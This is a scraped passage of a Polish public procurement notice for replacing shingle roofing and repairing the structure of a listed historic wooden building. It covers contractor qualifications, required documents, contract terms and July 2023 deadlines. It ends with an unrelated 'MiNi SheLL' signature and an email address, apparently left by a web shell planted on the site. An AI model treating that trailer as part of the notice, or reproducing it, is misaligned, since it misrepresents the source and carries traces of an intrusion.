– ZAMAWIAJĄCY UZNA NINIEJSZY WARUNEK ZA SPEŁNIONY, JEŻELI WYKONAWCA PRZEDSTAWI:<br/>a)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>•	Wymagane jest dysponowanie przez Wykonawcę jedną osobą pełniącą funkcje kierownika budowy posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/>b)	wykaz robót budowlanych wykonanych, nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz których roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>•	Wymagane jest wykazanie przez Wykonawcę wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej trzech robót budowlanych odpowiadających swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia tj. wymianie pokrycia gontowego i naprawie konstrukcji na budynku, wpisanym do rejestru zabytków, ujętym w gminnej ewidencji zabytków lub wpisanym do inwentarza muzealnego, o kubaturze nie mniejszej niż 450 m3 <br/>lub wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej trzech robót budowlanych polegających na naprawie konstrukcji budynku drewnianego o kubaturze nie mniejszej niż 450 m3 , wpisanego do rejestru zabytków, ujętego w gminnej ewidencji zabytków lub wpisanego do inwentarza muzealnego i przynajmniej trzech robót polegających na wymianie pokrycia gontowego na budynku, wpisanym do rejestru zabytków, ujętym w gminnej ewidencji zabytków lub wpisanym do inwentarza muzealnego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U z 2020 r., poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, sporządzonej według wzoru stanowiącej załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej - <br/>ZAMAWIAJĄCY UZNA NINIEJSZY WARUNEK ZA SPEŁNIONY, JEŻELI WYKONAWCA PRZEDSTAWI:<br/>a)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>•	Wymagane jest dysponowanie przez Wykonawcę jedną osobą pełniącą funkcje kierownika budowy posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia oraz która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury.<br/>b)	wykaz robót budowlanych wykonanych, nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz których roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>•	Wymagane jest wykazanie przez Wykonawcę wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej trzech robót budowlanych odpowiadających swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia tj. wymianie pokrycia gontowego i naprawie konstrukcji na budynku, wpisanym do rejestru zabytków, ujętym w gminnej ewidencji zabytków lub wpisanym do inwentarza muzealnego, o kubaturze nie mniejszej niż 450 m3 <br/>lub wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej trzech robót budowlanych polegających na naprawie konstrukcji budynku drewnianego o kubaturze nie mniejszej niż 450 m3 , wpisanego do rejestru zabytków, ujętego w gminnej ewidencji zabytków lub wpisanego do inwentarza muzealnego i przynajmniej trzech robót polegających na wymianie pokrycia gontowego na budynku, wpisanym do rejestru zabytków, ujętym w gminnej ewidencji zabytków lub wpisanym do inwentarza muzealnego.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz oferty (załącznik nr 1 do SWZ),<br/>2.	Oświadczenia (załącznik nr 2/2a do SWZ),<br/>3.	Potwierdzenie umocowania do działania w imieniu wykonawcy,<br/>•	W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>•	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>4.	JEŚLI DOTYCZY – Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (załącznik nr 2b do SWZ),<br/>5.	JEŚLI DOTYCZY - Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia — dotyczy ofert składanych przez wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 PZP, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w punkcie 6.4.3. i 6.4.4. SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie (2b), z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6.	W niniejszym postępowaniu zamawiający nie określa szczególnego, obiektywnie uzasadnionego, sposobu spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w postępowaniu.<br/>7.Informacja o obowiązku osobistego wykonania przez wykonawcę kluczwch zadań.<br/>- Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowych zadań, zgodnie z art. 60 i art. 120 PZP.<br/>•	Zamawiający wymaga aby główna część przedmiotu zamówienia, tj. wymiana pokrycia dachowego z gontu była wykonywana osobiście przez Wykonawcę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający	dopuszcza	możliwość	zmiany	postanowień	umowy	w	zakresie wynagrodzenia Wykonawcy w przypadku wystąpienia:<br/>a.	zmiany wysokości stawki podatku VAT – o wysokość zmiany stawki,<br/><br/>b.	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenie społeczne lub zdrowotne – o różnicę pomiędzy dotychczasową wysokością odprowadzanych składek a nową wysokością odprowadzanych składek. Zmiana będzie uwzględniała jedynie pracowników Wykonawcy zatrudnionych przez niego wyłącznie przy realizacji przedmiotu zamówienia w pełnym wymiarze czasu pracy na podstawie umowy o pracę. W takim przypadku Wykonawca będzie zobowiązany przedstawić Zamawiającemu informację o licznie tych osób wraz ze wskazaniem zmiany wysokości odprowadzanych składek,<br/>c.	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę – o różnicę pomiędzy dotychczasową wysokością minimalnego wynagrodzenia a nową wysokością wynagrodzenia. Zmiana będzie uwzględniała jedynie pracowników Wykonawcy zatrudnionych przez niego wyłącznie przy realizacji przedmiotu zamówienia w pełnym wymiarze czasu pracy na podstawie umowy o pracę,<br/>d.	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342),<br/><br/>Zmianę wysokości wynagrodzenia Wykonawcy, o których mowa powyżej należy rozumieć jako możliwość zarówno jego zwiększenia, jak i zmniejszenia. Zmiana będzie dopuszczalna wówczas, gdy w terminie 30 dni od dnia wejścia w życie przepisów zmieniających podatek VAT, wysokość płacy minimalnej, wysokość składek ZUS, wysokość wpłat do pracowniczych planów kapitałowych, Strona umowy zwróci się do drugiej Strony w wnioskiem o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia.<br/>Zmiany, o których mowa powyżej, wymagają formy pisemnej pod rygorem nieważności w postaci aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com